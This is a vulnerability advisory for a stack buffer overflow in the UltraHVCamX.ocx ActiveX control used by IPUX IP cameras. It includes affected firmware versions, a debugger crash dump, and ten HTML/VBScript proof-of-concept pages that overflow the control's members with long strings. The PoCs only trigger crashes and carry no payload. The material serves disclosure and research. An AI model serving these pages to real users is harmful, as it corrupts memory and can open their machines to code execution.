314 lines
No EOL
8.6 KiB
Text
314 lines
No EOL
8.6 KiB
Text
|
|
IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
|
|
|
|
|
|
Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
|
|
Product web page: http://www.ipux.net | http://www.fitivision.com
|
|
Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
|
|
Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
|
|
Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
|
|
|
|
Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
|
|
With high performance H.264 video compression, the file size of video stream is
|
|
extremely reduced, as to optimize the network bandwidth efficiency. It has full
|
|
Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
|
|
built-in USB port provides a convenient and portable storage option for local storage
|
|
of event and schedule recording, especially network disconnected.
|
|
|
|
Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
|
|
overflow vulnerability when parsing large amount of bytes to several functions in
|
|
UltraHVCamLib, resulting in memory corruption overwriting several registers including
|
|
the SEH. An attacker can gain access to the system of the affected node and execute
|
|
arbitrary code.
|
|
|
|
----------------------------------------------------------------------------------
|
|
|
|
(4b24.478c): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx -
|
|
eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
|
|
eip=10032459 esp=0030efe8 ebp=0030efec iopl=0 nv up ei pl nz na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
|
|
UltraHVCamX!DllUnregisterServer+0x100e9:
|
|
10032459 8b12 mov edx,dword ptr [edx] ds:002b:41414141=????????
|
|
0:000> d ecx
|
|
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
|
|
0:000> d eax
|
|
02d04d4f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04d5f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04d6f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04d7f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04d8f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04d9f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04daf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
02d04dbf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
|
|
----------------------------------------------------------------------------------
|
|
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
|
|
|
|
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2014-5212
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
|
|
|
|
|
|
16.11.2014
|
|
|
|
---
|
|
|
|
|
|
Properties:
|
|
-----------
|
|
|
|
FileDescription UltraHVCam ActiveX Control
|
|
FileVersion 1, 0, 52, 55 and 1, 0, 52, 54
|
|
InternalName UltraHVCamX
|
|
OriginalFileName UltraHVCamX.ocx
|
|
ProductName UltraHVCam device ActiveX Control
|
|
ProductVersion 1, 0, 52, 55 and 1, 0, 52, 54
|
|
|
|
|
|
List of members:
|
|
----------------
|
|
|
|
Interface IUltraHVCamX : IDispatch
|
|
Default Interface: True
|
|
Members : 66
|
|
RemoteHost
|
|
RemotePort
|
|
AccountCode
|
|
GetConfigValue
|
|
SetConfigValue
|
|
SetCGIAPNAME
|
|
Password
|
|
UserName
|
|
fChgImageSize
|
|
ImgWidth
|
|
ImgHeight
|
|
SnapFileName
|
|
AVIRecStart
|
|
SetImgScale
|
|
OpenFolder
|
|
OpenFileDlg
|
|
TriggerStatus
|
|
AVIRecStatus
|
|
Event_Frame
|
|
PlayVideo
|
|
SetAutoScale
|
|
Event_Signal
|
|
WavPlay
|
|
CGI_ParamGet
|
|
CGI_ParamSet
|
|
MulticastEnable
|
|
MulticastStatus
|
|
SetPTUserAllow
|
|
SetLanguage
|
|
SetZoomButtonFontColor
|
|
SetZoomButtonColor
|
|
SetFullScreen
|
|
|
|
|
|
Vulnerable members of the class:
|
|
--------------------------------
|
|
|
|
RemoteHost
|
|
AccountCode
|
|
SetCGIAPNAME
|
|
Password
|
|
UserName
|
|
SnapFileName
|
|
OpenFolder
|
|
CGI_ParamGet
|
|
CGI_ParamSet
|
|
MulticastEnable
|
|
|
|
|
|
PoC(s):
|
|
-------
|
|
|
|
|
|
---1
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Function MulticastEnable ( ByVal sIP As String , ByVal lPort As Long ) As Long"
|
|
memberName = "MulticastEnable"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 2
|
|
arg1=String(13332, "A")
|
|
arg2=1
|
|
target.MulticastEnable arg1 ,arg2
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---2
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let RemoteHost As String"
|
|
memberName = "RemoteHost"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(2068, "A")
|
|
target.RemoteHost = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---3
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let AccountCode As String"
|
|
memberName = "AccountCode"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.AccountCode = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---4
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let SetCGIAPNAME As String"
|
|
memberName = "SetCGIAPNAME"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.SetCGIAPNAME = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---5
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let Password As String"
|
|
memberName = "Password"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.Password = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---6
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let UserName As String"
|
|
memberName = "UserName"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.UserName = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---7
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Property Let SnapFileName As String"
|
|
memberName = "SnapFileName"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.SnapFileName = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---8
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Function OpenFolder ( ByVal sInitPath As String ) As String"
|
|
memberName = "OpenFolder"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.OpenFolder arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---9
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Function CGI_ParamGet ( ByVal sGroup As String , ByVal sName As String ) As String"
|
|
memberName = "CGI_ParamGet"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 2
|
|
arg1=String(1044, "A")
|
|
arg2="defaultV"
|
|
target.CGI_ParamGet arg1 ,arg2
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---10
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
|
|
prototype = "Function CGI_ParamSet ( ByVal sGroup As String , ByVal sName As String , ByVal SVal As String ) As Long"
|
|
memberName = "CGI_ParamSet"
|
|
progid = "UltraHVCamLib.UltraHVCamX"
|
|
argCount = 3
|
|
arg1=String(1044, "A")
|
|
arg2="defaultV"
|
|
arg3="defaultV"
|
|
target.CGI_ParamSet arg1 ,arg2 ,arg3
|
|
</script>
|
|
</html> |